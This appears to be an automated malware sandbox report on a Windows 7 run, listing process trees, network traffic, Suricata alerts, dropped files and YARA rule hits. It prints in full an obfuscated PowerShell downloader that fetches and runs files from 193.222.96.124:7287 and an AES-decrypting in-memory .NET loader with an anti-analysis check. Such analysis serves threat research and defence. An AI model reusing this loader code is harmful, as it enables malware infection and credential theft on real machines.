Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 9, 2024, 11 a.m. | May 9, 2024, 11:07 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv;
2668-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2836 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
1356 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2164
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.124 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.124:7287 -> 192.168.56.101:49168 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.101:49163 -> 193.222.96.124:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\111.xlsx |
file | C:\Users\test22\AppData\Roaming\~$111.xlsx |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
file | C:\Users\test22\AppData\Roaming\xD.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\111.xlsx.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\111.xlsx.LNK |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); " |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv; |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat" |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 9893 Content-Type: application/octet-stream Connection:close PK ! bîh^ [Content_Types].xml ¢( ¬ËNÃ0E÷HüCä-Jܲ@5íÇ*Q>ÀÄƪc[iiÿûB¡j7±ÏÜ{2ñÍh²nm¶Æ»RÈÀU^7/ÅÇì%¿rZYï @1__f q·ÃR4DáAJ¬h>ãÚÇVßƹªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I"{Üv^¥P!XS)bR¹rúK¾s(¸3Õ`cÞ0½ÝÎß»¾7M4²©ôªZÆk+¿|\|z¿(ôPúº6h_-[@!ÒØ Pk´2nÏ}Ä?£LËð Ýû%áÄßdºdN"m,à¥ÇDO97*~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}íàÈé;{ìÐå[îñé2þ ÿÿ PK ! µU0#ô L _rels/.rels ¢( ¬MOÃ0ïHüÈ÷ÕÝBKwAH»!T~Iܵ£$Ý¿'TG½~üÊÛÝ<êÈ!öâ4¬;#¶wúqu*&rFq¬áÄvÕõÕöGJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥=ZÆMYÞbø®ÕBSí°·7 êÏצé ?9LìÒÈsbgÙ®|Èl!õùUSh9i°br:"y_dlÀóD¿ý|-NÈR"4ø2ÏGÇ% õZ´4ñËyÄ7 ëÈðÉ¨Þ ÿÿ PK ! µñ Íù Ñ xl/workbook.xml¬UÛn£0}_iÿù w5©j#uWU¯/V8Á `Ö6Mªªÿ¾cé%/ÝvøÂã33ÇÃéÙ®,*$ãÕá´JyƪõÝÞ!2¤"UF ^Ñ!z¤¾;Ýr±Yr¾1 C+UÇ%ÓDðV`YqQS±¶d-(ÉdN©*˱mß* «P`ðÕ¥4áiSÒJu D}³Zöheú¸MS)/kX²©ÇeÏ×dYÛ;ì;·¶¡qúÀt´UÉRÁ%_©¶:ÒGþcÛÂøMvÇ1øk úÀt¬ÿIVþËÃöÑ0H«ÕJ |
Data received | 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 |
Data received | eGPOrnfIRdG2TwydecbFzwsBxkxkkhbBfd2LOD8OtD81t4oYZA1D6L9S9fmeZjNLxXYS0XMozLd+mFt1P58ofUOVzhoUSMwVfF8HPp3HqpdnO+9mLXzYimztfqQEFUD7yer+ABRae4WWEISWp94Z0qMJC5iLH61vZppENyqs03QRybwgnqllTOliTwRtq8Uk0NuJR79qb5D3gXb2TBqMeXSCXQuC0yyYd9VHSDbnGtX6gyn9mI/w+IDkE8hD8iWbgsWw4qeg5AoTnv34Vjp/jGQ1IWHz4H1F3ylWxBdgqAErHc5mMBYrUbBEex4ASRU19EA6JAn/1niQNmp6ZVNIxBHrPcxPrbPyTgMxfXz+9rHlBYaSZRNS4j8kSPpfMjNMeh26o6AuStcDTpbjqiwZCXRYBdJYsB6MKnt9KMVYioytIiNS3Ia9ldoHxg8fVzwRlnQuZy/0f7u4dc3M55cjy2gItG+bFMv3NLH4+xp/soZdnFl7X/PQ1DqEgV7mQJ3sgb3LDmV02m0PgK7ZnGeJzxMUu2V4NE+JDYsDuXPHmsm9lOlo9XrwKKMzO7skJCLO03PMIWZpJrAgawLt3NKt0OkwrTn7qgi3Nw+D2I89sKe3batBVwtQu2Wm8wfg2+u/U7gAgr3KlgmTF8fg6ZHspcFBmt0nJ1shhP4diVtyEj2bpr8DYRS8mgkCeVSVhks99enKRZv3yVtBTM7hEqHVg/Uij9/QN9c/1xNIYtHrsrxJgbFRiD3ocRWdY2iGQ2WfHg8XgRA4o4a60U5RpWzJnct7gEzjb1j48nw3/bsFbfip8iSS6KWEA3ih3+Q7xTT3HQ+tAbLKqXp4GW/p+v8k0f7b+41/8D8gnRy/I2fwIV+0sx8oVY7bN6pdZr9Ogx7uPike6YNkCJXhqNw2vVc6R9i00ExLNgOZP8xT8jDS+yOLi5ACPHc1wRnxWokwGxiNlpc7UAlEwGv8W2Kx2mZcPwDC9tkNnX5tMq2dETGEK5NFwJVxH0h8OgvJtZruwJQMkbhsTPAvwsKMLUCnBUwpSN+cRj9Pk0P0TEGUH2F2izt0MvhMzqrNGHdQCNCrTV2/POL9zjG3gJuS2kMQmHc6aw3EvdzDn1EysvhXAm1/643HNNN00ow+bVOPklDi8zQCafQhD+VcW2VkjjuXp0mYUWg5TXNwuHCFcnCSXUktJZm1Ntco1PWjuAVO05s8B99uP9qoYc+ZXfbaIBDMakNRunlXPRT4QlvuNtuiaoRRQQMQyTeY0JTnS7CC0e4avbZLct9QBaPZRqggACqL |
Data sent | GET /111.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive |
Data sent | GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.124 |
file | C:\Users\test22\AppData\Roaming\111.xlsx |
file | C:\Users\test22\AppData\Roaming\xD.bat |
cve | CVE-2013-3906 |
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\111.xlsx | ||||||
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xD.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xD.bat |
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
